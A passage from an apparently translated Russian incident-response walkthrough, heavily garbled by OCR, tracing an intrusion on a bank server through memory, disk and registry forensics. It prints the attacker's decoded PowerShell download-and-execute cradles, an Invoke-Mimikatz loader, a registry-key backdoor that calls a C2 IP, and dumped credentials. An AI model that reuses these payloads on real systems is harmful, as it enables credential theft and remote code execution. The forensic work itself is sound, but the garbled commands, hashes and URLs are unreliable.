параметров. Поскольку ІлІшіРгѵБЕ отвечает за парсинг и исполнение 
ѴѴМ 1-команд, может быть, и можно только надеяться на это, что эти 
команды по-прежнему хранятся в переменных внутри его адресного 
пространства... в этом случае это будет круто! 

Мы не только подтвердим наш анализ сетевого потока, но и 
сможем украдкой взглянуть на пейлоад атакующего! 

Давайте разберемся шаг за шагом и вначале запустим плагин 
р55сап для отслеживания всех структур _ЕРК0СЕ55 в памяти: 


:~/ѵо1а1:і1і1:у руТЬоп ѵоі.ру -Т /гооі:/тет_5ѵ0088.сІтр — 
ргоТі1е=Ыіп2012х64 рззсап 


Ѵоіагііііу Еоипсіа'ііоп Ѵо1а1:і1і1:у Егатѳѵгагк 2.6 
ОТГвеКР) Мате РЮ РРЮ РРВ 


Тіте сгѳаіесі 


ѲхѲѲѲѲѲѲѲѲЗсІа1794Ѳ ехріогег.ехе 2004 1908 
Ох00000Ѳ003сІа61080 рсмегзНеІІ .ехѳ 1716 2004 
0х000000003сІаа8080 ЗррЕхІСотОЬ] .Е 2316 528 
Ох0О0О00003сІаеѳ940 сопЬозІ: .ехѳ 2216 1716 
Ѳх000000003сІЬ33080 ШтіР гѵЗЕ. ехеі 2508 528 
0х000000003сІЬ51=940 ѴВохТгау.ехе 2596 2004 
0х000000003сІЬѳЬ940 зѵсРіозі: .ехѳ 2664 528 


0x0000000034036000 2017-ѲЗ-14 12:35:39 ІЛС+ѲѲѲѲ 
0x0000000027(191=000 2017-03-14 12:37:05 ІЛС+ѲѲѲѲ 
0x000000001Ы=7с000 2017-03-14 12:35:41 ІЛС+ѲѲѲѲ 
0x00000000116сСІ000 2017-03-14 12:37:05 ІЛС+ѲѲѲѲ 
0х00000000221=0а000 2017-03-14 12:35:48 ІЛС+ѲѲѲѲ 
0Х00000000252ѲСІ000 2017-03-14 12:35:51 ІЛС+ѲѲѲѲ 
0x0000000026112000 2017-03-14 12:35:51 ІІТС+ѲѲ00 


Отлично. Ѵоіаѣіііѣу нашел остаточную копию процесса 
ЫтіРгѵБЕ в памяти. Это было неизбежно, учитывая, что атакующий 
плотно использовал эту машину в последнее время. 

Наш следующий шаг - сделать дамп всего адресного 
пространства этого процесса при помощи плагина тетсіитр в 
Ѵо1а1:і1і1:у. Метсіитр парсит дерево дескрипторов виртуальных 
адресов (ѴАЭ), сохраняя страницы памяти, выделенные процессу, и 
копируя их содержимое в файл на диск. Далее мы можем 
просмотреть этот файл при помощи любимого инструмента 
аналитиков: §гер! 







:~/ѵо1а1:і1і1:у руТЬоп ѵоі.ру -Т /гоо1:/шет_5ѵ0088.сІтр 
ргоТі1е=Ыіп2012х64 тетсіитр -р 2508 -О /гоо1:/ои1:ри1:/5ѵ0088/ 

Ѵоіаіііііііу Роипсіаііоп Ѵоіаіііііііу Ггатемогк 2.6 

Ыгіііпе ЫтіРгѵБЕ.ехе [2508] Ііо 2508.<1тр_ 


Идея состоит в том, чтобы поискать классические пейлоады, 
используя базовые поисковые паттерны: “сшсі.ехе /с”, 
“роіл/егзііеіі.ехе”, “стсі.ехе”, “-зсгірІіЫоск” и проч. Конечно, 
ожидаем большое количество ложноположительных срабатываний. 
Трудно предположить, какой мусор будет в памяти, но мы надеемся 
найти несколько сияющих драгоценностей: 


:~/оиіриТ/5ѵ0088/ 5Ігіп§5 2508. (ітр Іе ге Р -і “ромегзЬеІІ.ехе” 

| ІѲ55 


ТАНкАсмВѲАШАЬОАи 
ОА20ВтАеЕАЬ0ВзАН0 

Ра1:И=С:\Міпсіомз\зу5і:ет32;С:ЧМіпсіомз;С :\Міпсіо\л/з\5уз1;ет32\МЬет;С:\МіпсІоыз\$узі:еш32\МіпсіомзРомѳгЗНеІТЛѵІ.Ѳ\;с : 
з\Віпп\;с ЛРгодгат РіІѳзХМіс гозоРІ: 501. ЗѳгѵѳгЛІѲѲѴЭТЗХВіпгЛ 
РЗМосІи1еРа1:И=С:\Ід/іпсІомз\зѵз1:ет32\ЫіпсІо\л/зРомегЗНѳТЛЛѵІ.0\МосІи1ез\ 

№з1:есІМосІиТ.е5="Міс гозоРІ: .РомегЗИеІІ .СопзоІеНозІ: .сПЛ" 


роѵчегзЬеП.ехе -М Ьісісіеп -ѳпс ЗАВіАНІАЬмВЗАНМА2()ВуАСААР(}АдАЕ4А20ВЗАС0АТмВіАеоА2(}Ві АНОАІА 3 
АНМАІАА9АРзАІІ\«/В5АНМАсІАВ1А00АІдВОАйІІАсІААиАЕМАсдВ1АС0А2ОВиАНОАаОВИА0мАОмВИАСМАаАВ1АР0АОдА6А: 


гюаиТёРаѣп=С 


іѴіпсІоѵі/зХзуз'І: ешЗ 


яіпаомзромегь 


Эта длинная РоѵѵегЗпеІІ-команда крайне подозрительна! 
Декодируем Ьазе64-пейлоад, чтобы увидеть, что прячется внутри: 


:~/ои 1 :ри 1 :/ 5 ѵ 0088 / есііо " 

]АВіАНІАЬыВЗАНМА2дВуАСААРаА§АЕ4А2аВЗАС0АТыВіАеоА2дВз‘АНСАІАВТАНкАсмВ0АСиАЬаАиАЕ4А25[...]" 
|Ьазе64 -сі 

$Ьгоызег = №м-ОЬзесІ: Бузііет.N61:. ЫеЬСИеггЬ; 

Яэгомзег.Ргоху.СгесІепІііаІз = 

[Бузует. Ыеі:.СгесІепІііаІСасМе]: :0е-Раи1'Ше'ЬыогкСгесІеп1:іаІ5; 

ІЕХ($Ьгомзег. Оомп1оагі51гіп§( "Мііірз: //акап0871-РазсІ2аіасІ. 0973(2сІс. сот/13К08(25І засіеге")); 


Бинго! Этот пейлоад загружает какой-то рандомный скрипт 
(0оіл/п1оасІ51:гіп§) с очередного С&С-сервера и выполняет его в 
памяти при помощи команды ІЕХ (Іпѵоке-Ехргеззіоп), не оставляя 






совершенно никаких следов на диске. Мы вручную выгружаем 
пейлоад, используя м§е1:, но разрешение имени терпит неудачу. 


(:((]І_а! : -/ѵоіаііііту# мдеТ М:1:р5://акапѲ871Га]сІ2аіасі.Ѳ973С!сІс .сот/13КѲ8С)5І] асіеге 
- -2017-07-16 15:03:20-- ІтСТрз ://акапѲ871Та] сігаіасі .097] цсіс .сот/13КѲ8()2І] асіеге 
Кезоіѵіпд акапѲ871Та] сігаіасі .097] дсіс .сот (акапѲ871Га]сІ2аіасІ.Ѳ97]дсІс .сот) ... 'Гаііесі: 
мдеТ : ипаЫѳ Іо гезоіѵе НозТ асісігѳзз 'акапѲ871Га] сігаіасі .097] дсіс .сот' 


Кажется, домен не зарегистрирован. Правда ли это? 
Атакующий на всякий случай создал бэкдор - скрипт, подгружающий 
команды и выполняющий их - но не потрудился зарегистрировать 
соответствующее имя домена? 70 

Что ж, тогда мы сделаем это за него! Спешим на СоОасІсІу 
(или к любому другому регистратору доменов) и заказываем имя 
домена. 


097]^сІс.сот 

8еагсН Адаіп 



Ѵез! Ѵоііг сіотаіп із аѵаіІаЫе. 


097іяс1с.сот шдаЕо.99* 

ѵѵГіеп уои гедізіег Тог 2 уеагз ог тоге 
Ізі уеаг ргісе Е0.99 АсШіопаІ уеагз Е12.99 


Размещаем небольшой веб-сервер для логирования всех 
входящих запросов; таким образом мы получим исчерпывающий 
список всех зараженных машин. Не забудьте прописать 
НТТР-заголовок Х-РогмагсІесІ-Рог 71 , иначе мы будем получать один 
и тот же ІР прокси для всех соединений: 


70 Вы можете подумать, что никакой реальный атакующий не допустит подобную глупость, не 
так ли? Почитайте про программу-вымогателя ѴѴаппаСгу. Именно это и произошло: 

Іійрз:/Аллл/ѵѵ. таіѵѵагеіесіі. сот/201 7/05/Но\л/-іо-ассібеп{аІІѵ-5Іор-а-дІоЬаІ-сѵЬег-айаск5.Іі1тІ 


71 И1{рз://сИгіз\л/іедтап. сот/201 4/05/деШпд-соггесНр-асісІгезз-рИр/ 












Возвращаемся обратно к нашему форензик-анализу и 
продолжаем искать странные РоѵѵегЗИеІІ-команды. Поскольку мы 
знаем, что атакующий использует формат “-епс [Ьазе64_з1:гіп§]”, 
то фокусируемся в основном на этом паттерне: 


:~/ои1:ри'1:/5ѵѲ088/ 5І:гіп§5 2508. сітр |§гер -і "роиег5Гіе11.ехе -Ы 
МісИеп -епс" 

роиегвМеН.ехе -Ы Іпісісіеп -епс 

ІІАВІАНІАЬѵ\/ВЗАНМА2(2ВуАСААР(2А§АЕ4А2(2ВЗАС0АТыВІА(]оА2(2В ]АН(2А1АВТАНкАсиВ0АС11А[ . . . ] 
роыегзііеіі.ехе -Ы Нісісіеп -епс 

ЗАВіАНІАЬцВЗАНМА2(ЗВуАСААРдАёАЕ4А2(ЗВЗАСѲАТыВіА6оА2дВ ]АН(ЗА1АВТАНкАсыВ0А(]ЦАЬ(ЗАиАЕ 


И снова удача! Второй пейлоад для декодирования: 


:~/оіг(рііі/5ѵѲ088/ есЬо " 

ЗАВіАНІАЬиВЗАНМА2дВуАСААРдА§АЕ4А2дВЗАС0АТмВіАСоА2дВ}АНдАІАВТАНкАсмВѲАСІ)АЬдАиАЕ4А2д[...] " 

|Ьазе64 -сі 

$Ьгомзег = Мем-ОЬ^'есІ: Бузует. №1:.1\ІеЬС1іегѵІ:; 

$Ьгомзег.Ргоху.СгесІеп1:іаІ5 = 

[ Бузует. МеІ.СгесІепІіаІСасЬе]: :0е-Раи11№'ЫогкСгес1еп'1:іаІ5; 

ІЕХ($Ьгом5ег.0омп1оасі51:гіп§("ІтІ:1:р5://гаіл/.§і1:ЬиЬи5егсоп1:еп1:.сот/Ромег5Ие1ІМа-Ріа/Ромег5р1оі1:/та5І:ег/Ех-Рі11:га1:іоп/Іпѵоке- 
Мітікаіг.рзі ")); 

Іпѵоке-тітікаііг | ои1:--Рі1е -аррепсі "С:\изегз\риЫіс\аррсІа1:а\1оса1ѴЬетр.р(Й:" 


Интересно! Кажется, атакующий использует 

РоѵѵегЗИеІІ-версию Мішікаііг, которая собирает все учетные записи, 
присоединенные к машине. Затем она сохраняет результат в файл 
С:\изегз\риЫіс\аррсІа1:а\1оса1\1:етр.рсІ1:. Давайте запустим 
плагин -Рііезсап, чтобы проверить, сможем ли мы сграбить копию 
прямо из памяти: 







:~/ои*рігІ:/5Ѵ0088/ руТЬоп ѵоі.ру -Т /гооТ/тетзѵѲѲвв.сІтр 
ргоТі1е=Міп2012х64 Тііезсап 

ѴоІаТіІіТу Роипсіаіііоп Ѵоіаііііііу Ргатемогк 2.6 
ОР-р5е‘Ь(Р) #РТг #НпсІ Ассезз Мате 


Неудача. Кажется, РоѵѵегЗІіеІІ закрыл дескриптор на файл. 
Ничего страшного, мы получим его, используя стандартный анализ 
диска позже. 


Мы продолжаем искать другие подозрительные команды в 
этом пространстве памяти, но находим одни и те же пейлоады. 
Кажется, мы высушили колодец, которым является 1лІшіРгѵ5Е .ехе. 


Учитывая, что доменное имя, которое мы обнаружили ранее, 
было неактивным, стоит проверить другие возможные имена 
доменов или ІР-адреса, с которыми недавно контактировала 
машина. Запускаем плагин пеѣзсап 72 для сбора любых объектов, 
хранящих сетевую информацию в памяти: 


ТСРѵ4 

0.0.0.0:3389 

0.0.0.0:0 

ілзтЕіше 

1884 

зѵсЬозТ,ех« 

ТСРѵ4 

0.0.0.0:3389 

0.0.0.0:0 

ілзтЕмше 

1884 

зѵсНозТ .ех< 

ТСРѵб 

:::3389 

:: :0 

ІЛ5ТЕІЧШ6 

1884 

зѵсГіозТ .ех( 

ТСРѵ4 

10.30.10.88:49154 

110.232.64.190:443 

СЬОЗЕО 

-1 


ТСРѵ4 

10.30.10.88:13591 

151.101.120.133:443 

СЮЗЕО 

-1 


ІІ0Рѵ4 

0.0.0.0:0 

* • * 


912 

зѵсЬозТ.ех« 


Интересно! У нас есть два закрытых соединения в 
направлении удаленных ІР-адресов. Игнорируем РЮ, 
выставленный на -1; указатель на эту структуру, должно быть, 
поврежден, поскольку объект был освобожден какое-то время 
назад. Из двух ІР-адресов, один является “ложно” положительным. 
Можете угадать, какой именно? 

151.101.120.133 резолвится в гаи.§і1:ИиЬи5егсоп1:еп1:.соіті. 
Правильно, он был использован РоѵѵегЗІ'іеІІ-скриптом для загрузки и 

72 Соппзсап и зоскзсап используют ТСР объекты, отсутствующие в ѴѴІпсІоѵѵз 2012, отсюда 
необходимость в использовании плагина пеізсап. 






запуска Мішікаііг; но все же это легитимный веб-сайт, так что мы 
можем вычеркнуть его из списка вредоносных артефактов. 

Другой ІР-адрес, однако, не резолвится в доменное имя, и 
находится в Индонезии, вряд ли можно ожидать такое от 
внутреннего сервера европейского банка: 


іпеТпит : 

110.232.64.0 - 110.232.64.255 

пеТпате: 

Ш5АМЕТ-!>Ш 

СІ95С г: 

РТ. Мѳсііа АпТаг ІМиза 

сіѳзсг: 

ІпТегпеТ Зегѵісе Ргоѵісіег 


Месіап 

соипТ гѵ : 

ІО 1 

асітіп-с : 

В598-АР 


Мы добавляем его в список потенциальных С2С-серверов, на 
всякий случай. Это, конечно, порождает вопрос: “Как машина 
связывается с этим ІР-адресом?” Похоже, что эта информация 
потеряна в памяти. 

Если это действительно бэкдор, мы могли бы терпеливо 
подождать, пока он не придет в действие в следующий раз, затем 
поспешить снять дамп памяти. Это могло бы сработать. 

Однако, будет гораздо быстрее проанализировать основные 
места на диске, в которых атакующие обычно настраивают свой 
механизм закрепления. Как упоминалось ранее, идеальным местом 
для поиска бэкдоров являются ключи реестра. 

Есть множество способов достижения устойчивости, но ключи 
реестра, безусловно, являются наиболее надежными и часто 
используемыми атакующими. Для этого нам нужно извлечь файлы с 
кустами реестра, в которых хранятся все ключи, и поискать 
подозрительные данные. А следовательно, самое время углубиться 
в анализ диска. 73 


73 Мы могли бы собрать ключи реестра из дампа памяти, но мы получим только поднабор 
текущих используемых ключей. Кроме того, поскольку процесс, который мог установить ключи 
для закрепления, уже давно исчез, мы в любом случае не найдем интересующие нас ключи. 






Анализ диска 


ѴІѴЮК-файл, который мы выгрузили ранее, является копией 
полного жесткого диска, выделенного для виртуальной машины. 
Обычно физический жесткий диск повторяет структуру, 
изображенную ниже: 


Скрытая 

прошивка 

мвк 

Вооі 

Данные 

Васк 

ир 

Вооі 

Неисполь¬ 

зуемый 

Вооі 

Данные 

Неисполь¬ 

зуемое 

дисковое 

пространство 

Неисполь¬ 

зуемый 

Вооі 

Данные 

1 И ! 

Н У 

НН 


Первичный раздел Логический раздел Логический раздел 


Хотя в ѴІѴЮК-файле нет кода прошивки, стоит отметить, что 
на стандартном диске этот код выполняет ключевые операции 
(контроль дефектов, диагностические проверки на старте и проч.). 

Он не доступен для операционной системы, а следовательно, 
в большинстве случаев, мало используется, хотя некоторые 
исследователи сообщают о способах злонамеренного 
использования инструментов диагностики с целью сокрытия данных 
в этой части диска. Как бы то ни было, это слишком дорогостоящая 
и медленная операция, чтобы использовать ее в реальной жизни 
(по крайней мере, пока что). 

Главная загрузочная запись (МВГС) - это таблица, которая 
находится в первом доступном логическом цилиндре (адрес 0 на 
диске). 

Это 512-байтная структура, которая описывает схему 
разделов (количество разделов, в каком из них хранится основная 
операционная система и так далее), в ней также содержится 
исполняемый код, который передает управление загрузочному 















сектору первичного раздела, который в свою очередь загружает 
операционную систему. 



Жесткий диск 


Главная 

загрузочная 

запись 


Раздел 


Загрузочный 

сектор 


1 


ІЧіШг 


тТ5.5у5 

ІЧІОБкгпІ.ехе 


Операционная 
система 


Загрузочный сектор загружает архитектуру А ІТР8 74 

Внутренняя структура раздела сильно зависит от 
установленной в него операционной системы. ѴѴіпсІоѵѵз, например, 
использует файловую систему ІМТР5 для организации файлов и 
директорий в разделе. 

ЫТРЗ-раздел начинается с таблицы загрузочного сектора, 
которая загружает операционную систему ѴѴіпсІоѵѵз. 75 За ней 
следует главная файловая таблица (МРТ), это глобальный индекс, 
хранящий метаданные всех файлов и директорий в разделе. 


74 И^Р5:/ДесИпеГтісго5оД.сот/еп-и5/ІІЬгагѵ/сс781134(ѵ=\л/5.10).а5рх 

75 Резервный загрузочный сектор находится рядом с окончанием раздела. 




















Каждому файлу или директории выделяется отдельная запись 
в таблице МРТ, в которой хранятся их атрибуты (даты создания, 
изменения и доступа, адреса блоков, права доступа, файлы в папке 
и т.д.). 

При проведении анализа диска все, что нам нужно - это 
распарсить МРТ, чтобы точно понять, что произошло на диске во 
время атаки: какие файлы были модифицированы, созданы, скрыты 
и так далее. 

Основное преимущество в парсинге МРТ по сравнению с 
простым монтированием раздела при помощи стандартных 
инструментов (тоипі: в Ыпих) заключается в возможности анализа 
каждого уголка секторов, выделенных под систему. 

Подобным образом мы можем извлекать удаленные файлы, 
выявлять скрытые данные (альтернативные потоки данных) 76 , 
проверять целостность МРТ, анализировать поврежденные 
секторы, получать неиспользуемое пространство 77 и так далее. 

ѴМБК-файл, который мы извлекли ранее, повторяет 
практически такую же структуру, как и у обычного жесткого диска. 

Поскольку мы в большей степени заинтересованы в 
системных файлах, измененных атакующим для достижения 
устойчивости, нам нужно найти адрес правильного раздела, 
содержащего операционную систему, чтобы извлечь релевантные 
файлы. Будем использовать фреймворк 51еігЫіКіѣ, набор 
форензик-инструментов, чтобы распарсить структуры и метаданные 
диска 5Ѵ0088: 


:~/ ттІ5 -і аТТНЬ 5ѵ0Ѳ88_с1І5к.ѵтсік 


76 Ийр://ѵѵ\л/\л/.1 : огеп5Іс1 : оси5.сот/ЫсісІеп-сІа1а-апаІѵ5І5-п^5 

77 И^р://\л/\л/\л/.5Іеи1ИкіІога/5Іеи{І~ікИ/тап/ЫкІ5.І~і1:тІ 







1005 РагТіТіоп 

ТаЫе 





ОТТзеТ 

: БесТог 

: 0 





ипіТз 

аге іп 

512-ЬуТе зесіогз 





5ІОІ 

БТагТ 

Епсі 

1_епд1Іі 

Оезсгірііоп 


000: 

МеТа 

0000000000 

0000000000 

0000000001 

Ргітагу ТаЫе 

(#0) 

001: 


0000000000 

0000002047 

0000002048 

Ііпаііосаіесі 


002: 

000:000 

0000002048 

0000718847 

0000716800 

МТР5 / ехРАТ 

(0x07) 

003: 

000:001 

I 0000718848 

0083884031 

0083165184 I 

МТР5 / ехРАТ 

(0x07) 

004: 

000:002 

0083884032 

1060446534 

0976562502 

МТР5 / ехРАТ 

(0x07) 


БІеиІІіКіѣ по умолчанию не работает с ѴІѴЮК-файлами. Нам 
нужно добавить опцию “-і”, загружая расширение а-Р-РІіЬ. Если вы 
под классической ІІЬипіи, а не под Каіі, вам также нужно будет 
скачать набор инструментов а-Р-РІіЬ. 78 

Как показывает ттіз, диск содержит три выделенных 
ЫТРЗ-раздела: 

• Раздел 1 размером в 716 800 секторов (367 МБ) 

• Раздел 2 размером в 83 165 184 секторов (42 ГБ) 

• Раздел 3 размером в 976 562 502 секторов (500 ГБ) 

Первый раздел слишком мал, чтобы держать операционную 
систему, и поэтому, должно быть, хранит данные для 
восстановления. Третий раздел слишком велик для системных 
данных и, вероятно, содержит общие сетевые ресурсы. Мы делаем 
ставку на второй раздел и исследуем его МРТ, используя утилиту 
ТІ5 (также в составе ЗІеиІИКіІ): 


78 зисіо арі-деі іпзіаіі аІТІіЬЧооІз 
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РгоБгалЮаТа 

А/А 

137-144-5 

ІІзегз 

г/г 

[••■] 

182-144-5 

ЫІПСІОМ5 


Выбор был правильным! В первом столбце нам сообщается, с 
чем мы имеем дело - файл или директория (значение 7* означает, 
что запись была удалена), во втором столбце находится 
уникальный идентификатор записи (называемый іпосіе, 137-144-5 
для папки С:\изег5), и наконец, в третьем столбце содержится имя 
ресурса. Файлы, которые начинаются со знака $, являются частью 
файловой системы ІМТРЗ (таблица МРТ хранится в файле под 
названием $МРТ, а ее резервная копия в $МРТМігг). 

Помните тот интересный файл, в который сохранялись 
учетные данные? Он находится в 

“С:\и5ег5\асІтіпІ5І:га1;ог\аррсІа1;а\1оса1\”. Чтобы попасть туда, 
мы спускаемся по дереву каталогов, предоставляя 
соответствующий іпосіе команде -РІ5, до тех пор, пока не достигаем 
файла іетр.рсіі:: 
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Тетр 


г/г 

181620-144-1 : 

Іеар.ріП 



Как только мы оказываемся в позиции іпосіе файла 
(181620-144-1), мы можем извлечь его содержимое при помощи 
утилиты ісаі: (также в составе ЗІеігЫіКіѣ): 


:~/ ісаі -і аТТІіЬ -о 718848 БѴ0088_сІІ5к.ѵтсік 181620-144-1 > 

іетр. рсіі 

:~/ І5 -1 Іетр.рсН: 

-гм-г—г— 1 гооТ гооі 1.5М Маг 14 13:10 Іетр.рсИ 

:~/ саі Тетр.рсЦ |1е55 

[...] 

* ІІБегпате : АсІтіпІБІгаІіог 

* Оотаіп : І.Е05ТКІКЕ 

* МИМ : с0Т2е311(13Т450а7ТТ2571ЬЬ59ТЬе4е5 

* 5НА1 : 233сІ80717279ЬеЗТ198е37811е319есІа87Т73977 

[•••] 

мсЦ^езІ: : 

* ІІБегпате : §еог§е5_асІт 

* Оотаіп : І.Е05ТРІКЕ 

* Рэббмогсі : СНагѵе1*880 

[-] 

мсІіееБІ: : 

* ІІБегпате : гасЬеІ 

* Оотаіп : 1-Е05ТКІКЕ 

* Рэббмогсі : 5Нииг091% 


[•••] 







1,5 МБ! Мама дорогая, да это же файл с паролями! План 
восстановления будет, конечно же, включать специальную 
инструкцию для сброса всех паролей, но некоторые учетные записи 
сбросить гораздо труднее, чем остальные. Взять хотя бы 
локального администратора, например. 

Мы можем ясно понять, что атакующий завладел его 
І\ІТІ_М-хэшем, который в окружении ѴѴіпсІоѵѵз эквивалентен версии 
пароля в открытом тексте. 79 

Этот пароль, на деле, одинаковый на всех ѴѴіпсІоѵѵз-машинах. 

Вот как атакующий прыгал с одного сервера на другой без 
необходимости в использовании а_ирсІа1:е. Нам нужно не только 
изменить этот пароль, но и сделать его уникальным на каждой 
машине - что, как вы можете догадаться, потребует определенной 
работы. 80 

Необычный размер файла с паролями предоставляет для нас 
очень ценную улику. Процесс снятия дампа повторяется либо на 
регулярной основе (запланированное задание), либо по 
определенным событиям (открытие сеанса, запуск службы и так 
далее). Все эти элементы могут быть найдены в тех же компонентах 
ѴѴіпсІоѵѵз: в ключах реестра! Они хранятся на диске в файлах, 
находящихся по адресу: 

• С:\МіпсІоіл/5\5у5ѣет32\соп-Рі§\5Ѵ5ТЕМ хранит системные 
параметры 

• С:\МіпсІои5\5у5ѣет32\50РТІлІАКЕ содержит параметры 
программного обеспечения и ѴѴіпсІоѵѵз 


79 Почитайте книгу “Занимайся хакингом с ловкостью порнозвезды”, в ней приводится пример 
массированной атаки разз-Ите-НазИ. 

80 Утилита ГАРЗ от МісгозоГі - это свободное и очень эффективное решение: 
ИНрз://\л/\л/\л/.тісгозоД.сот/еп-из/сІо\л/пІоасі/сІе^аіІз.азрх?ісІ=46899 




• С:\МіпсІо»л/5\5у5І:еіті32\5АМ хранит локальных пользователей и 
хэши паролей 

• С:\МіпсІоілі5\5у5І:еіті32\5ЕСШІТѴ содержит политики 
безопасности, применяемые к текущему пользователю 

• С:\и5ег5\асІтіпІ5ѣгаѣог>\ІУІти5ЕК.0АТ хранит предпочтения 
пользователя 

Мы извлекаем их, используя -Різ и ісаі:, как было показано 
ранее, и готовимся погрузиться в десятки тысяч бинарных значений, 
большей частью незадокументированных: 


:~/ ісаі -і аТТІіЬ -о 718848 5ѵ0088_сІІ5к . ѵтсік 25583-128-3 > БАМ 
>/ ісаі -і аТТІіЬ -о 718848 5ѵ0088_сІІ5к. ѵтсік 25584-128-3 > 

5ЕСІШТѴ 

:~/ ісаі -і аТТІіЬ -о 718848 5ѵ0088_сІІ5к.ѵтсік 25585-128-3 > 

5Ѵ5ТЕМ 

:~/ ісаі -і аТТІіЬ -о 718848 5ѵ0088_сІІ5к.ѵтсік 27569-128-3 > 

БОЕТМАКЕ 


К счастью, нам не нужно проходить через этот процесс без 
надлежащего оснащения. Мы будем использовать Ке^гіррег 81 , 
опенсорсный инструмент, для извлечения различной информации о 
ключах реестра: иконки, по которым кликал пользователь 
(изегАззІБІ:), локальные параметры брандмауэра, история 
браузера, пакеты программного обеспечения... и конечно, 
классические ключи для закрепления в системе. 

Модуль зо-Р1:_гип в Ке§гіррег анализирует следующие ключи, 
используемые для достижения устойчивости в системе: 

1. НКІМ\Б0РТМАКЕ\Місго5оТі\Міпс1ом5\Сиггеп1:\/ег5Іоп\Кип 

Запускает любую программу, определенную подключом, на старте 
сеанса. Программа запускается с правами пользователя. 


81 ИІ:1:р5://аИІіиЬ.сот/кеѵсіеШ9/НеаНіррег2.8 






2. НКІМ\50РТМАКЕ\Місго5О-р*\Міпс1ом5\Сиггепі:\/ег5Іоп\Кип0псе 

Тоже самое, что и предыдущий раздел, но программа удаляется из 
ключа реестра после входа пользователя в систему. 

3. НКІМ\50РТМАКЕ\Місго5оТТ\Міпс1оіл/5 МТ\СиггепТѴег5Іоп\Тегтіпа1 
5егѵег\Іп5Та11\5оТТіл/аге\Місго5оТТ\Міпгіом5\Сиггепі:Ѵег5Іоп\Кип 

Запускает любую программу, указанную в подключе на старте 
НОР-сеанса. Программа запускается с правами пользователя. 

4. НКІМ\Б0РТМАКЕ\Місго5оТТ\Міпсіоіл/ 5 МТ\СиггепТѴег5Іоп\Тегтіпа1 

Бегѵег\Іп5Та11\5оТТмаге\Місго5оТТ\МіпсІом5\Сиггепі:\/ег5Іоп\Кип0псе 

Тоже самое, что и предыдущий, но программа удаляется из ключа 
реестра после старта НОР-сеанса. 

5. НКІМ\Б0РТМАКЕ\Моі\/б432Мосіе\Місго5оТТ\Міпс1ом5\Сиггепі:\/ег5Іоп\Кип 

Запускает любую программу, указанную в подключе, на старте 
сеанса. 


6 . 

НКІМ\Б0РТМАКЕ\Моіл/6432Мос1е\Місго5оТТ\Міпсіоіл/5\СиггепТѴег5Іоп\Кип0псе 

Тоже самое, что и предыдущий, но запускает только один раз. 

7. 

НКІМ\Б0РТМАРЕ\Місго5оТТ\Міпсіоі\/5\СиггепТѴег5Іоп\Ро1ісіе5\Ехр1огег\Кип 

Запускает программу каждый раз, когда пользователь открывает 
проводник ѴѴіпсІоѵѵз. 


8 . 

НКІМ\Моіл/6432Мос1е\Місго5оТТ\Міпс1оіл/5\Сиггепі:Ѵег5Іоп\Ро1ісіе5\Ехр1огег\ 

Кип 


Тоже самое, что и предыдущий. 


9. НКІМХБоТТмагеХМісгозо-РТХІлІіпсІомзХСиггепТѴегзіопХКипБегѵісез 


Запускает программу как службу на старте. 


С: \са5е\геегіррег> гір.ехе -г 5оТТ.Ьіѵе2 -р зоТТгип 


Ыом 6432 ЫосІе\Місго 20 -Р(:\Ыіпсіоы 5 \Сиггеп'(;Ѵегзіоп\Кип 

(.азШ-Ие Тіте ІТЬи ЕеЬ 02 06:19:13 2017 |(ЦТС) _ 

ЦіпсІощзЦргіа'Ье - | ромегзИеІІ -Ы Ьісісіеп -епс ЗАВіАНІАЬмВЗАНМА20Ь уАСААР0АкАЕ4А20ВЗАСѲАТмВіАбоА2рВіА> 
с§ВѵАНсАсмВ1АНІАІ8ВдАНІАЬиВ4АНкАІ§В0АНІА2(гВкАбиАЬ8ВѲАЬ8ВѲАбиАЬ8ВѲАС4АУіл/ВѵАбѲАЫВдАб8АсІмВ1АНІАи 


І.ав'ЫлІггЬе Тіте [ТИи РеЬ 02 06:33:12 2017 (1ЯС)| 


ЫіпгіоызЫ51)5 - ромегзИеІІ -И Иісісіеп -епс І^ВОАеиАсііліА1:АЕ8АУ§ВяАСІІАУиВѲАСААІ_(5В]Ае8АЬ<ЭВѵА6ІАа§В1АО 
УѵмВЬАН0Аа0ВѵА64АОліАиАНУАа0В2А6кАУ8ВзА6ЦАР0В6А6ЕАЬАВ2А6ЦА0мАиА64АУ0В2А6кА2мВЬАН0А20АоАСсАаАВ8; 


В точку! Мы уже знакомы с содержимым первого ключа, с 
лукавством названного как ЫіпсІомБирсІаІіе; он запускает процесс 
Мітікаііг, который сохраняет пароли в файл. При этом второй ключ 
совершенно новый для нас: 


:~/ есЬо п РдВ0АШАсІмА1:АЕ8АѴ§Вд [...]" |Ьазе64 -сі 


$іе=Ме\л/-0Ьз'ес1: -сотоЬзесТ Іп1:егпе1:Ехр1огег . Арріісаіііоп; 

$іе. ѵІ5ІЫе=$РаІ5е; 

$іе. паѵі§а1:е(' ІіТТрз ://110.232.64.190/Акзохѵк]091'); 
зТапТ-зіеер -5 Б; 

$г=$іе.ОоситепТ. Ьосіу. іппегНТМІ.; 

$іе.яиі1(); 

ІЕХ $г 

Ключ действительно работает в качестве бэкдора! Каждый 
раз, когда открывается сеанс, он отправляет запрос на С2С-сервер, 
ожидая получить скрипт для загрузки и выполнения. Это тот же 
самый ІР-адрес, который мы выявили в памяти ранее, но не смогли 
отследить непосредственный пейлоад. 





Раз уж на то пошло, давайте отработаем по этой зацепке и 
скачаем этот пейлоад. 82 Мы заменяем команду “ІЕХ” на более 
безобидную команду “мгі1е-Ио5І”, затем выполняем скрипт: 

$іе=№іл/-0Ь]'ес1: -сотоЬзесТ Іп1:егпе1:Ехр1огег . Арріісаііоп; 

$іе. ѵІ5ІЫе=$РаІ5е; 

$іе. паѵіеа-Ье (' ІгМірз: //110. 232 .64.190/Ак5охѵк]091'); 
зіагі-зіеер -5 Б; 

$г=$іе. Ооситепі:. Ьосіу. іппегНТМІ.; 

$іе.риі1(); 

ІлІгіТе-ИозІ: $г | оиТ-ТіІе .\ 5 сгір 1 :_Ак 5 охѵкз 091 . 1 :х 1 : -аррепсі 


Р5 С:\ехатр1ез\НІК> беІ-СогѵЬепІ: .\зсгірѣ_Ак50хѵкзѲ91.-(:х1 

ІЕХ (Мем-ОЬ^есІ: Меі.ЫеЬсІіеггЬ). бомп1оасІ5І:гіп§( "РгЬРрз: //11Ѳ. 232.64.190/рЗаіаи§а1іаух") 
Р5 С:\ехатр1ез\НІК> 


Очередной небольшой зіадег, который вновь загружает код с 
того же самого С2С-сервера. Продолжаем играться и снова меняем 
метод выполнения, чтобы теперь вывести данные: 
